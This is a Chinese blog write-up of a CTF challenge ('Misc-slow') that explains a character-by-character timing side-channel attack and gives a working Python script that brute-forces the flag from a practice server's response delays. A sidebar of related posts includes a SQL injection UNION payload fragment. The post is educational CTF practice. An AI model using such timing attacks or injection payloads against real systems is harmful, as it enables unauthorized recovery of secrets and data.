CTF-hackme-Misc-slow-解题记录

最新推荐文章于 2022-05-08 14:01:51 发布
最新推荐文章于 2022-05-08 14:01:51 发布
阅读量436 收藏 1
点赞数
分类专栏: CTF 文章标签: 1024程序员节 python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qql2011/article/details/109261906
版权
题目:
nc hackme.inndy.tw 7708
OMG, It's slow.

解题步骤

本题采用的是时序攻击,第一次见这种题目,也是参靠了别人的代码做出来的
具体原理就是用你输入的flag和数据库中的从第一位开始比对,比对到错误的那一位直接退出。

  1. 假设每比对一位的耗时是1s,正确的flag前五位一定是FLAG{
  2. 当输入FLAG{_}时,如果耗时6s,说明第六位_是错的,因为比对到_就退出了,如果耗时7s,则说明_是对的,因为比对到第7位}才退出
  3. 利用这种原理,可以一位位的破解出flag
  4. 此题及其耗时程序大概有执行1-2个小时
#!/usr/bin/env python2
# -*- coding: utf-8 -*-  
import socket
import time


def remote(s,a) :
    berror = True 
    while berror == True :
        try :
            client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            client.connect((s,a))
            berror = False
            return client
        except socket.error : #异常处理,因为可能会国外网站原因报错 
            print '---socket.error'
            client.close()
            berror = True
            
string = '_9876543210ZYXWVUTSRQPONMLKJIHGFEDCBA'
flag1 = ['F','L','A','G','{']
flag2 = '}'
start_delay = 6
break_flag = 0
while True :
    for i in string:
        p = remote('hackme.inndy.tw', 7708)
        time.sleep(0.2) #接收到所有返回,也是因为网络原因 
        temp = p.recv(1024)
        #print temp
        a = time.time()
        payload = ''.join(flag1)+i+flag2
        #print i
        p.send(payload)
        s = p.recv(1024)
        #print s
        b = time.time()
        print '%s [+] Delay: %d s' % (payload,int(b-a))
        p.close()

        if int(b-a) == start_delay + 1: #耗时+1 说明是正确位 
            flag1.append(i)
            start_delay += 1
            break
        if i == 'A': #比对结束 
            print 'flag is %s' %(''.join(flag1)+flag2)
            print 'over___'
            break_flag = 1
            break
    if break_flag == 1 :
            break

Misc-slow

qql2011
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
starctf 2019 hackme
weixin_46483787的博客
04-19 2567
学kernel的第四天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写四个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写
hackme(web wp)
Xi4or0uji
09-06 4273
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&id=-1 union select 1,2,(select table_name fr...
字节二面被问到CTF真题?我立马就是一套A接W接外圈刮震射全场!
MachineGunJoe666
06-22 1028
MISC部分 BlueTeaming 列举缓存在内存的注册表
2019 *CTF hack_me
csdn546229768的博客
05-08 761
题目 2019 *CTF hack_me 保护 $ checksec ./hackme.ko [*] '/home/hnhuangjingyu/hackme/hackme.ko' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x0) -------------------------------
linux kernal pwn STARCTF 2019 hackme(一) 劫持modprobe_path
yongbaoii的博客
04-20 511
从用户态传入了0x20的数据,其数据放在了pool里面 在IDA里面看的话就是 就是他传入的四个QWORD 。 我们可以看得出来30001的时候就是通过v17来找到相关地址,然后kfree,再清零 所以其实就看得出来v17是index。 功能30002 v8是slab的地址 v20是从哪开始写 v9[1]里面就是size 所以就是往里面写 功能30003 上面是写进去 所以这个自然就是读出来 功能30000 读入一段 根据这一段申请slab 漏洞有两个 首先我们显而易见的在读写slab的时候对of.
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码编码类型的功能,大大减少手工判断和重复尝试的时间,使密码解码更为便捷高效。
CTF-MISC关于各类编码习题(湖工商扛把子)
最新发布
03-17
在网络安全领域,尤其是Capture The Flag (CTF)竞赛中,Miscellaneous(杂项)...了解和熟练掌握这些编码方式对于CTF比赛中的Misc任务至关重要,能够帮助你在面对复杂信息时迅速找到正确的解码路径,从而成功破解挑战。
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 exiftool 哈希猫 开膛手约翰 GTFObins 尼克托 哈希标识符 网猫 ftp Binwalk Steghide 卷曲 PowerSploit 九头蛇 漏洞数据库 Nessus 枚举 客户端 linEnum 豌豆 我叫什么名字网 谷歌地图 希拉 我被弄死了吗 Jeffrey的图像元数据查看器 雷达2 ILSpy 电源外壳 破解站 x Shodan 加油站 Dcode.fr Stegsolve 异或 fcrackzip Vim 小便pdf vmonkey tplmap xsrfprobe jwt.io c-jwt-cracker wfuzz kerbrute 拍板 鲁比乌斯 邪恶的温克 uf 敲门(端口敲门)
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
Hackme CTFMisc--flag
VZZmieshenquan的博客
01-25 753
Description: All flags are in this format: FLAG{This is flag’s format} Solution: 送分题,直接拿到flag Flag: FLAG{This is flag’s format}
hackme ctf-re
qq_43605837的博客
04-26 357
hackme总结: 首先得到反编译的代码就很简单: __int64 sub_400F8E() { char v1[136]; // [rsp+10h] [rbp-B0h] int v2; // [rsp+98h] [rbp-28h] char v3; // [rsp+9Fh] [rbp-21h] int v4; // [rsp+A0h] [rbp-20h] unsigned _...
CTF入门需要知道的Hack Bar的安装与使用方式
tothemoon的博客
11-20 1万+
前言: hackbar时一款小巧但是用途非常广的一款浏览器插件,掌握它也是ctf比赛所需要的最基本的知识。 hackbar可以测试SQL注入,XSS漏洞和网站的安全性,帮助开发人员做代码的安全审计,检查代码,寻找安全漏洞。 本篇文章主要说的是它的POST传参功能。 一,安装 google浏览器与火狐浏览器都支持hackbar,这里主要讲火狐浏览器的安装。 1.打开组件,搜索hackbar,或者点下...
Hackme CTF】Web--LFI
VZZmieshenquan的博客
04-21 1512
Description: What this admin’s password? That is not important at all, just get the flag. Tips: LFI, php://filter Solution: 其实见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本...
XCTF hackme(爆破不成功)
lhk124的博客
08-31 201
1111
[GKCTF 2021]RRRRsa
weixin_51867782的博客
07-08 2960
复现[GKCTF 2021]RRRRsa 拿到题目后,准备操作,额,,, 看了看大佬的wp,恍然大悟,分享一下解题的思路。(部分题目如下) 一般看到这种像hint1的式子,都需要用gcd(,n)去分解出q或p。推导过程如下(官方题解) 推导过程需要用到二项式定理和费马定理。原理如下: 1)二项式定理: 2)费马定理:a^p = a mod p; 了解原理后,在看题解就容易多了。总结了一下: 1)拿到两个式子后,先把括号去掉,然后把常数项去掉; 2)之后得到的式子应该是俩个只含p或q的式子,让两个式子的p(
CTF基础-MISC
热门推荐
Sn1P3r的博客
09-13 3万+
编码是什么?   编码是信息从一种形式或格式转换为另一种形式的过程,也称为计算机 编程语言的代码简称编码。 用预先规定的方法将文字、数字或其它对象编成数码,或将信息、数据 转换成规定的电脉冲信号。   编码在电子计算机、电视、遥控和通讯等方面广泛使用。编码是信息从 一种形式或格式转换为另一种形式的过程。解码,是编码的逆过程。  Morse编码   摩尔斯电码(Morse code...
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值